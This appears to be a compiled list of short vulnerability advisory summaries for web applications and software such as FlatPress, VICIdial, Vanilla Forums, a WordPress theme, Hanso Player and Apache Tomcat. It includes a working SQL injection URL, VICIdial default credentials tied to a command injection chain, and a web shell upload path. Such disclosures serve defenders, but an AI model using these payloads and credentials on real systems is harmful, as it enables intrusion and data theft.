This blended threat exploits a vulnerability in FlatPress, a content management system, by executing code injected into a comment. The exploit requires the inlinePHP plugin to be enabled. The attacker posts a comment containing malicious code, which is then loaded as a page through directory traversal.
The vulnerability is caused by insufficient validation of user-supplied data appended to "/blog-by-cat/" URL. Remote attacker can execute arbitrary SQL commands to read, modify or delete information in application's database. The following exploitation example will display all posts from category 1, if the MySQL Server version is 5.x, otherwise no posts will be displayed: http://[host]/blog-by-cat/1%20and%20substring(version(),1,1)=5/
The file agc/manager_send.php in the VICIdial web application uses unsanitized user input as part of a command that is executed using the PHP passthru() function. A valid username, password and session are needed to access the injection point. Fortunately, VICIdial has two built-in accounts with default passwords and the manager_send.php file has a SQL injection vulnerability that can be used to bypass the session check as long as at least one session has been created at some point in time. In case there isn't any valid session, the user can provide astGUIcient credentials in order to create one. The results of the injected command are returned as part of the response from the web server. Affected versions include 2.7RC1, 2.7, and 2.8-403a. Other versions are likely affected as well. The default credentials used by Vicidial are VDCL/donotedit and VDAD/donotedit.
User input passed through the 'Messages' and 'Response' POST parameters is not properly sanitized before being used in a call to the 'Gdn_Format::Unserialize' method at lines 327 and 360. This can be exploited to inject arbitrary PHP objects into the application scope, that could allow an attacker to conduct Local File Inclusion attacks by abusing the 'Gdn_Module::__toString' method, which triggers a call to the 'Gdn_Module::FetchView' method.
RASPcalendar 1.01 is vulnerable to an authentication bypass vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This will allow the attacker to bypass authentication and gain access to the application.
A vulnerability in the WordPress themekernel-theme Themes allows an attacker to upload a malicious file to the server. The vulnerable file is upload-handler.php, which is located in the functions folder of the theme. An attacker can exploit this vulnerability by sending a POST request to the upload-handler.php file with a malicious file attached. The malicious file will be uploaded to the server and can be accessed via the URL http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php
Input passed via the 'for_id' parameter is not properly sanitised before being processed. This can be exploited to extract sensitive information from the database(s).
Hanso Player 2.5.0 is vulnerable to a buffer overflow vulnerability due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by crafting a malicious M3U file and convincing the user to open it, resulting in arbitrary code execution.
Apache Tomcat 5.5.25 and below (other versions could be affected) is prone to a CSRF vulnerability affecting the Manager application (which is the component utilized to start/stop/deploy/undeploy applications) in order to perform the malicious activities such as stop an existing application, undeploy an existing application, deploy a new application. This exploit demonstrates how to automatically undeploy an existing application.
Multiple client-side cross site scripting vulnerabilities are detected in the official pdirl PHP Directory Listing web-application. The vulnerability allows remote attackers to manipulate via GET method web-application to browser requests (client-side). The client-side cross site scripting web vulnerability is located in the vulnerable index.php file and the id path value.
Services By CQR